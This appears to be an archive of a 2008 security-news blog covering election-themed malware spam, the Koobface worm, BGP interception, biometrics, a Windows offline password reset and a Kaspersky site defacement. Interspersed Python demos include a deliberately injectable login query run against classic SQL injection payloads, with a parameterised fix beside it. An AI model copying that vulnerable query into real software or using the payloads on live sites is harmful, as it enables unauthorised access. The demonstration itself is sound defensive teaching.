According to investigators at the FBI and the White House, a “foreign entity or organization” is believed to be behind the attacks in an attempt to “gather information on the evolution of both camps’ policy positions.” The information could prove useful in negotiations with a future administration. The investigators told the Obama team the hack wasn’t carried out by political opponents.
Representatives of both campaigns weren’t available to comment on the Newsweek report.
Cyber criminals are actively capitalizing on Barack Obama’s victory in the US presidential race. Within 12 hours of his acceptance speech Tuesday night, net users were being treated to scams involving Google AdWords and prodigious volumes of spam.
The spam is disguised as dispatches from legitimate news sources, including the BBC and CNN, and invites readers to click a link to view a video of Obama accepting his country’s vote. Those who take the bait are sent to a spoofed page of the news site that claims they need to update their Adobe Flash Player before viewing the speech.
In fact, Adobe_flash9.exe installs the notorious Trojan-PSW:W32/Papras.CL, according to anti-virus provider F-Secure. Earlier Wednesday, just 14 of the 36 major anti-virus programs detected the trojan, according to an analysis from VirusTotal. Once installed, the malware, which cloaks itself in a rootkit, logs passwords for bank sites and other sensitive information and sends them to a server located in Ukraine.
The fraudulent news sites are being hosted on a fast-flux network of infected machines, according to CyberCrime & Doing Time blog. Cloudmark, a company that provides spam filtering service, has already seen more than 10 million of the spam messages, according to the Zero Day blog.
Scammers were also exploiting the now-completed presidential race using Google’s Sponsored Links. Early Wednesday, searches related to the President Elect returned paid results that included links to websites that tried to install malware on end users’ machines, The Times Online reported. The malicious ads were no longer appearing on Google at time of writing.
The barrage of Obama-themed attacks are part of a broader trend of using current events to trick people into following links that lead to attacks. The US presidential election has been a favorite source of such attacks over the past year, with the names of candidates such as John McCain, Hillary Clinton, Ron Paul and Mike Huckabee all invoked.
Old Facebook Worm Using New Ways To Spread By Abusing Google Reader And Picasa Websites
Hackers initially unleashed Koobface in late July, but Facebook’s security team soon slowed its spread by blocking the websites that were hosting the malicious Trojan software. That has prompted the criminals to change tactics: in this latest attack they have hosted files that appear to be YouTube videos on Picasa and Google Reader and used Facebook to send links to them to victims.
The links appear safe because they go to Google sites, but once the victim arrives on the Google Reader or Picasa page, he is invited to click on a video or a web link. The victim is then told he needs to download special codec decompression software to view the video. That software is actually a malicious Trojan Horse program, which is blocked by most anti-virus programs, according to Facebook.
The cyber-criminals behind Koobface may have deliberately misspelled their Facebook messages to help them evade detection by filters. This latest attack does not use the self-copying worm code that Koobface used last August, but it could easily be added.
Koobface has been a top security concern at Facebook since July. The worm’s creators have used Facebook’s instant messaging feature and also hosted their malicious links on sites such as Tinyurl.com and Bloglines.
Security experts have long warned that the Web 2.0 mash-up model of allowing users to put together their own content from many different sources naturally creates many security problems. In part, this is because it allows anyone to post material on trustworthy domains such as Google.
Facebook is working with Google to shut down the problem, said Facebook spokesman Barry Schnitt.
24.10.08
Windows Media Player vulnerability
Vulnerability in Windows Media Player Could Allow Remote Code Execution (954154)
Executive Summary
This security update resolves a privately reported vulnerability in Windows Media Player that could allow remote code execution when a specially crafted audio file is streamed from a Windows Media server. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
This security update is rated Critical for all supported and affected editions of Windows Media Player 11. For more information, see the subsection, Affected and Non-Affected Software, in this section.
The security update addresses the vulnerability by correcting the manner in which Windows Media Player 11 handles audio files streamed from a server-side playlist (SSPL). For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.
Recommendation. Microsoft recommends that customers apply the update immediately.
20.10.08
Introducing Biometric Technology
Facial biometrics is one of the fastest growing areas of biometrics. Current facial recognition software can convert a photograph or a video frame into a code that describes a face’s physical characteristics. This can be used to identify a person at a distance, without intruding on their personal space.
Facial identification software reads the peaks and valleys of an individual’s facial features; these peaks and valleys are known as nodal points. There are about 80 nodal points in a human face, but the software needs only 15-20 to make an identification. Specialists concentrate on the golden triangle region between the temples and the lips. This area of the face stays the same even if hair or a beard is grown, weight is gained, the person ages, or glasses are put on.
Hand Geometry Identification Technology
Viable hand geometry devices have been manufactured since the early 1980s, making hand geometry the first biometric to find widespread computerized use. It remains popular; common applications include access control and time-and-attendance operations.
Since hand geometry is not thought to be as unique as fingerprints or irises, fingerprinting and iris recognition remain the preferred technology for high-security applications. Hand geometry is very reliable when combined with other forms of identification, such as identification cards or personal identification numbers. In large populations, hand geometry is not suitable for so-called one-to-many applications, in which a user is identified from his biometric without any other identification.
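The reason a modality that is "very reliable" for one-to-one verification can be unsuitable for one-to-many identification is arithmetic: every template in the gallery is one more chance for a false match, so the system-level false match rate grows roughly as 1 - (1 - FMR)^N. The Python below is an added example, not from the original page or any vendor: it carries that calculation through and pairs it with a Monte Carlo estimate of FMR/FNMR for a toy matcher whose score distributions are constructed Gaussians (the 0.45/0.80 means and 0.70 threshold are assumptions, not measurements of any real device).

```python
import math
import random


def identification_false_match_rate(fmr: float, population: int) -> float:
    """Probability that a 1:N search of an unenrolled probe against `population`
    templates returns at least one false match, given the per-comparison false
    match rate `fmr` and independent comparisons."""
    if not 0.0 <= fmr <= 1.0 or population < 0:
        raise ValueError("fmr must be in [0, 1] and population non-negative")
    return 1.0 - (1.0 - fmr) ** population


def max_population_for_target(fmr: float, target_far: float) -> int:
    """Largest gallery size whose system-level false match rate stays at or
    below `target_far` for a matcher with per-comparison rate `fmr`."""
    if not 0.0 < fmr < 1.0 or not 0.0 < target_far < 1.0:
        raise ValueError("rates must be strictly between 0 and 1")
    return int(math.floor(math.log1p(-target_far) / math.log1p(-fmr)))


def estimate_rates(threshold: float, trials: int = 20000, seed: int = 1):
    """Monte Carlo estimate of (FMR, FNMR) at `threshold` for a toy matcher.
    Impostor scores ~ N(0.45, 0.10), genuine scores ~ N(0.80, 0.06): constructed
    distributions for illustration, not data from any real biometric system."""
    rng = random.Random(seed)
    impostor_accepts = sum(1 for _ in range(trials) if rng.gauss(0.45, 0.10) >= threshold)
    genuine_rejects = sum(1 for _ in range(trials) if rng.gauss(0.80, 0.06) < threshold)
    return impostor_accepts / trials, genuine_rejects / trials


if __name__ == "__main__":
    fmr, fnmr = estimate_rates(0.70)
    print(f"1:1 verification at t=0.70: FMR={fmr:.4f} FNMR={fnmr:.4f}")
    for n in (10, 1_000, 100_000):
        far_n = identification_false_match_rate(fmr, n)
        print(f"1:N identification, N={n:>7}: system false match rate={far_n:.3f}")
    print("largest gallery for a 1% system false match rate:",
          max_population_for_target(fmr, 0.01))
```

With a per-comparison FMR around half a percent the same matcher that looks acceptable for verification is almost guaranteed to return a wrong hit somewhere in a gallery of 100,000, which is why the text pairs hand geometry with a card or PIN to turn the search back into a 1:1 check.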
DNA can be collected from any number of sources: blood, hair, fingernails, mouth swabs, blood stains, saliva, straws, and anything else that has been in contact with the body at some time. DNA matching has become popular in criminal trials, especially in proving rape cases (Landers, E., 1992). The main problem with DNA biometrics is that identifying someone by their DNA is not quick. The process is also very costly (Baird, S., 2002).
DNA biometrics is not a foolproof method of identification. If forensic scientists do not conduct a DNA test properly, a person’s identification code can be skewed. Another problem is matching prior DNA samples to new samples; this is a bigger problem in DNA fingerprinting. The information looks like a bar code, and if it is not closely inspected an incorrect match can be made (SAIC, 2004).
At Georgia Tech, professors and students are developing a system that can recognise a person’s gait from radar signals. The Doppler-based method is 80-95 percent effective in identifying an individual. Research engineer Bill Marshall explains that they decode radio signals reflected off a person’s walking stride as the person walks toward the source. The signal pattern is converted into an individual’s audio signature, which can be catalogued for later use. Marshall is careful to add that audio signals decoded from an individual’s gait are not unique to that person: any number of people may share the same audio signature. Unlike DNA or fingerprints, however, gait biometrics can catalogue an individual without them knowing they were ever observed.
Gait biometrics would be particularly useful for identifying criminal suspects: police could scan a large crowd for a suspect without the suspect knowing. Gait biometrics could also be used to spot shoplifters, particularly fake ‘pregnant’ women, since women pretending to be pregnant walk differently from women who actually are. This would be a large advance if introduced to common retail stores.
Some sources acknowledge what gait biometrics claims it can do but doubt its ability to perform. A gait system can be deceived because walking patterns can sometimes be altered, and skeptics doubt its ability to perform in real-life scenarios such as airports and large crowds. Regardless of what critics say, gait biometrics will have to prove its capabilities in action.
Most wanted top 10 security analyzer
Proxy / ISA Log Analyzer 2.61 (updated 28 May 2008): Proxy/ISA Log Analyzer is a high-performance log analyzer that allows you to analyze and quickly generate useful reports on Internet connection usage based on data from logs created by Microsoft Proxy Server 2.0 or Microsoft ISA Server log files.
Security System Analyzer 1.6b2 (updated 21 April 2008): Security System Analyzer is free, non-intrusive, OVAL-compatible software. It provides security testers and auditors with an advanced overview of the security policy level applied.
eMailTrackerPro 7.0i (updated 18 January 2008): Identify the sender of email messages, trace and report spammers, identify ‘phishing’ emails and other scammers trying to steal your confidential information.
GFI WebMonitor for ISA Server 4 (updated 22 October 2007): GFI WebMonitor for Microsoft ISA Server allows you to monitor HTTP and FTP downloads for viruses and other malware in real time.
GFI EventsManager 7 (updated 3 February 2007): This program monitors the security event logs of all your Windows NT/2000/XP servers and workstations and alerts you to possible intrusions/attacks in real time.
WFP Tools 1.0 (updated 18 January 2006): WFP Tools allows the replacement of an infected/corrupted file with the original clean file you had when Windows was first installed, thus avoiding reformatting your computer.
ZoneLog Analyser 1.19 (updated 2 February 2004): ZoneLog Analyser reads and displays the log file generated by ZoneLabs' ZoneAlarm.
proDETECT 0.2b (updated 24 March 2003): proDETECT is an open source promiscuous mode scanner with a GUI.
VisualZone 5.7 (updated 10 September 2002): VisualZone is an intrusion analyser and report utility for ZoneAlarm, ZoneAlarm Plus and ZoneAlarm Pro.
19.10.08
How to reset a Microsoft Windows password
ERD Commander is part of the Microsoft Diagnostics and Recovery Toolset (DaRT), whose 30-day evaluation is available here (MSDaRT50Eval.msi - 64.2 MB). We covered MS DaRT earlier in the article Perform a System Restore rollback on a non-bootable Windows XP computer. Follow steps 1-7 in that article to create an ERD Commander Boot CD.
1. Insert the ERD Commander Boot CD into the drive and restart the system.
2. Boot the computer from the ERD Commander Boot CD. You may have to change the boot order in the BIOS first.
3. Select your Windows XP installation from the list.
4. From the ERD Commander menu (Start menu), click System Tools and then Locksmith.
5. Pick the user account whose password you want to reset and enter the new password.
Note that this is an offline edit of the local account database: anyone who can boot the machine from their own media can reset any local account the same way. A BIOS password that locks the boot order and full-disk encryption are what prevent it, and a reset done like this also loses access to any EFS-encrypted files that were protected by the old password.
Breaking news
-->>South Korean Army under attack
The country's defense industry faces a serious security risk from hackers. A Grand National Party lawmaker said Sunday, based on data provided by the National Security Research Institute, that LIGNex1, a guided-missile manufacturer, uncovered malicious code planted by hackers in its major computer systems in March, and that Hyundai Heavy Industries, which builds naval vessels, found the same in September.
LIGNex1 develops and manufactures the Hyunmoo surface-to-surface missile, the Haeseong ship-to-ship missile and the Shingung portable ground-to-air weapon. Hyundai Heavy Industries built the King Sejong the Great, the nation's first Aegis ship, plus destroyers and submarines for the Navy. Although the development costs of such high-tech weapons are kept secret, the construction of a King Sejong the Great-class destroyer is said to cost over W1 trillion (US$1=W1,165), and development of the Haeseong ship-to-ship missile W100 billion, with each missile at approximately W2 billion.
Source : Chosun Ilbo News paper , NSRI
-->>Teenage hacker charged over DDoS attack on Scientology
A teenager who took part in a distributed denial-of-service attack against the so-called Church of Scientology has been charged.
Dmitriy Guzner, 18, of Verona, New Jersey, is charged with helping in the January attack on Scientology servers. He has agreed to plead guilty to a single felony charge of unauthorized impairment of a protected computer and to pay $37,500 in damages.
Guzner identifies himself as a member of the online group ‘Anonymous’, a loose collection of internet activists who undertake online actions such as the attack on Scientology (dubbed Project Chanology), the tracking and arrest of suspected paedophile Chris Forcand and the hacking of vice-presidential candidate Sarah Palin’s email. The Justice Department has said that Guzner will be put on trial in the coming weeks and could face up to ten years in prison.
-->>Internet-scale 'man in the middle' attack disclosed
In Black Hat's October Webinar on Thursday, Anton Kapela, datacenter manager at 5Nines Data, spoke about Internet-scale "man in the middle" attacks.
The talk reprised a last-minute substitution presentation he gave with Alexander Pilosov at this year's Defcon conference in August. During the conference the two researchers intercepted all conference Internet traffic at the Riviera Hotel in Las Vegas and ran it through their servers; according to Black Hat founder and director Jeff Moss, most attendees didn't realize this was being done.
"This is an emergent vulnerability," said Kapela in the Webinar. "It only becomes apparent in thousands of networks, not one." He took pains to explain that this is a condition of the Internet as it is today. "I'm not talking about any particular failing, or vendor implementation. This is something that happens because we're using it all," he said.
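The write-up above does not say how the interception worked. The Pilosov and Kapela Defcon 16 presentation relied on BGP: announce a more-specific prefix for the victim's address space so that every network that accepts it prefers the attacker's route by longest-prefix match, and prepend the ASNs of the networks on the path back to the victim so that those networks discard the announcement through BGP loop detection and keep carrying the intercepted traffic on to its real destination. The Python below is an added example, not code from the speakers, from 5Nines Data or from the original page: a minimal route-monitor check over a constructed table of monitored prefixes and permitted origin ASNs, fed constructed UPDATE records. The prefixes are RFC 5737/RFC 3849 documentation space and the ASNs are private-use numbers; the AS_PATH is modelled as a plain list with the origin last.

```python
import ipaddress

# Constructed monitoring table: our prefixes and the ASNs allowed to originate them.
MONITORED = {
    "192.0.2.0/24": {64500},
    "2001:db8::/32": {64500},
}


def check_update(prefix: str, as_path: list, monitored=MONITORED) -> list:
    """Return alert tuples for one BGP UPDATE (prefix plus AS_PATH, origin = last ASN).

    Two conditions are reported:
      origin-hijack : exactly our prefix, announced with an origin ASN we do not own.
      more-specific : a sub-prefix of ours from anyone, whatever ASN ends the path.
    The second fires regardless of origin on purpose: the Defcon demo prepended the
    victim's own path, so an origin-only check would have passed it.
    """
    net = ipaddress.ip_network(prefix, strict=False)
    origin = as_path[-1]
    alerts = []
    for mon, origins in monitored.items():
        mnet = ipaddress.ip_network(mon)
        if net.version != mnet.version:
            continue
        if net == mnet:
            if origin not in origins:
                alerts.append(("origin-hijack", mon, prefix, origin))
        elif net.subnet_of(mnet):
            alerts.append(("more-specific", mon, prefix, origin))
    return alerts


def scan(updates, monitored=MONITORED) -> list:
    """Run check_update over an iterable of (prefix, as_path) records."""
    out = []
    for prefix, path in updates:
        out.extend(check_update(prefix, path, monitored))
    return out


# Constructed UPDATE records, not captured routing data.
SAMPLE_UPDATES = [
    ("192.0.2.0/24", [64510, 64500]),            # legitimate: our upstream, then us
    ("192.0.2.0/24", [64512]),                   # someone else originates our prefix
    ("192.0.2.128/25", [64512, 64510, 64500]),   # more-specific with our path prepended
    ("198.51.100.0/24", [64513]),                # unrelated prefix, ignored
    ("2001:db8:1::/48", [64512, 64500]),         # IPv6 more-specific, same trick
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_UPDATES):
        print(alert)
```

A monitor like this only sees what its own vantage point receives, so in practice it is fed from several route collectors. RPKI route origin validation, which postdates this talk, rejects the wrong-origin case outright and, when the ROA's maxLength equals the announced prefix length, the more-specific case as well; it does not validate the rest of the path.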
8.10.08
Breaking news
Source : APACS & THE REGISTER
6.10.08
Breaking news
4.10.08
Zero day attacks
With experience, however, hackers are becoming faster at exploiting a vulnerability, and sometimes a hacker is the first to discover it. In these situations the vulnerability and the exploit may become apparent on the same day. Since the vulnerability isn't known in advance, there is no way to guard against the exploit before it happens; companies exposed to such exploits can, however, institute procedures for early detection of an exploit.
A study released by Symantec in early 2004 found that although the number of vulnerabilities discovered was about the same in 2003 as in 2002, the time between a vulnerability and exploits based on it had narrowed. According to the infoAnarchy wiki, "14-day" groups and "7-day" groups carry out an exploit within 14 or 7 days of a product's market release. Conducting a zero-day exploit establishes crackers as members of the elite, because they must have covert industry connections to gain the inside information needed to carry out the attack.
Archive: Kaspersky kicked
The official Malaysian Kaspersky Antivirus website was hacked yesterday by a Turkish cracker going by the handle "m0sted". The same cracker also hacked the official Kaspersky S.E.S. online shop and several other subdomains. The attacker gave "patriotism" as the reason for the attack and "SQL injection" as the way the intrusion was performed. Both websites had their home pages defaced, as well as several other secondary pages. The incident, though it looks like a simple website defacement, could carry big risks for end users, because both websites distribute evaluation copies of Kaspersky Antivirus to the public. In theory the attacker could have uploaded trojanized versions of the antivirus, infecting unaware users who downloaded from what they trusted as a Kaspersky file repository (remember the trojan in the Debian file repository?).
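The report names SQL injection as the way in but gives no detail. The Python below is an added example, not code from Kaspersky, from the attacker or from the original page: a login check written the injectable way beside the parameterised version, run against a constructed in-memory SQLite table (the user name and password are made up). It shows the two classic payloads, a comment marker that truncates the password check and an OR clause that makes the WHERE always true, succeeding against the first and failing against the second with no other change.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for a shop's user table (constructed data).
    Plaintext passwords are used only to keep the injection visible; a real
    store holds salted hashes and compares them outside SQL."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT PRIMARY KEY, pw TEXT NOT NULL)")
    con.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    con.commit()
    return con


def login_vulnerable(con: sqlite3.Connection, name: str, pw: str) -> bool:
    # Attacker-controlled strings are pasted straight into the statement text,
    # so a quote in either field rewrites the query instead of being data.
    sql = f"SELECT count(*) FROM users WHERE name = '{name}' AND pw = '{pw}'"
    return con.execute(sql).fetchone()[0] > 0


def login_safe(con: sqlite3.Connection, name: str, pw: str) -> bool:
    # Bound parameters travel separately from the statement, so quotes,
    # comment markers and OR clauses in the input stay inert string values.
    sql = "SELECT count(*) FROM users WHERE name = ? AND pw = ?"
    return con.execute(sql, (name, pw)).fetchone()[0] > 0


if __name__ == "__main__":
    con = make_db()
    attempts = [
        ("admin", "correct-horse"),      # honest login
        ("admin'--", "anything"),        # comment out the password check
        ("nobody", "x' OR '1'='1"),      # make the WHERE always true
    ]
    for name, pw in attempts:
        print(f"{name!r:12} {pw!r:16} vulnerable={login_vulnerable(con, name, pw)!s:5} "
              f"safe={login_safe(con, name, pw)}")
```

The defacement is the visible symptom; the same injection point that rewrites a page can read or alter whatever else the database user can reach, which is why the trojanized-download scenario above is the real worry. Publishing hashes and signatures for downloads, and checking them, is the download-side control; parameterised queries are the server-side one.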
28.9.08
3G is hacked too !
A group from Brazil has managed to unlock Apple's iPhone 3G handset just days after its release.
The unlocked iPhone is shown and demonstrated in an online video on a Portuguese-language news blog.
An unlocked iPhone can be used with any SIM card and service provider.
iPhone user Bruno MacMasi said in an interview with Gizmodo that the unlocking process involved modifying the SIM hardware so that the International Mobile Subscriber Identity can be overwritten, detaching the card from the original network.
A similar process was used to unlock the original iPhone last year.
Separately, a group of researchers known as the iPhone Devteam has released the first 'jailbreak' software releases for the iPhone 3G and the iPhone 2.0 software update.
The 'jailbreak' term refers to the process of removing the software controls which prohibit users from installing software outside of the iPhone App Store.
The group, which has asked not to be linked to directly for bandwidth purposes, is currently offering a software utility which automatically performs the jailbreak process.
Unlocked and modified handsets have been an issue ever since Apple first released the iPhone. Users initially were eager to remove the strict controls over installing software and run the handset with other carriers.
While the iPhone App Store has allowed for the distribution of third-party applications, there remains a dedicated group of users wishing to run older third-party applications and software which have not been approved for the Store.
Apple has attempted to remain relatively neutral on the matter. The company said that, while the jailbreak processes will void the warranty and possibly cause damage to the phone when new updates are installed, no special efforts will be made to deliberately disable or 'brick' hacked iPhones.